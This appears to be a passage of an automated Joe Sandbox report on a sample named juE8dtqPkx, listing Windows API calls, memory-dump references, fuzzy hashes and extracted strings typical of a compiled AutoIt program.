                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                    • API String ID: 2907320926-3566645568
                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                    • DeleteObject.GDI32(00000000), ref: 00470A04
                                                    • DestroyIcon.USER32(00530055), ref: 00470A1C
                                                    • DeleteObject.GDI32(441FC6A5), ref: 00470A34
                                                    • DestroyWindow.USER32(004E0045), ref: 00470A4C
                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 1237572874-0
                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                    • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                    • String ID:
                                                    • API String ID: 3413494760-0
                                                    • Opcode ID: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                    • Opcode Fuzzy Hash: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                    • String ID: AU3_FreeVar
                                                    • API String ID: 2634073740-771828931
                                                    • Opcode ID: 8d470d0c64585686c564057c2e1d16e6d7e789933144b6863c06fa6be443890c
                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                    • Opcode Fuzzy Hash: 8d470d0c64585686c564057c2e1d16e6d7e789933144b6863c06fa6be443890c
                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                    APIs
                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 2294789929-1287834457
                                                    • Opcode ID: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                    • Opcode Fuzzy Hash: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                    APIs
                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 2483343779-2107944366
                                                    • Opcode ID: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                    • Opcode Fuzzy Hash: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                    • _wcslen.LIBCMT ref: 00450720
                                                    • _wcscat.LIBCMT ref: 00450733
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                    • String ID: -----$SysListView32
                                                    • API String ID: 4008455318-3975388722
                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                    • GetParent.USER32 ref: 00469C98
                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                    • GetParent.USER32 ref: 00469CBC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2360848162-1403004172
                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                    • String ID:
                                                    • API String ID: 262282135-0
                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                    APIs
                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                    • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                    • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                    • String ID:
                                                    • API String ID: 3771399671-0
                                                    • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                    • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                    • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                    • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
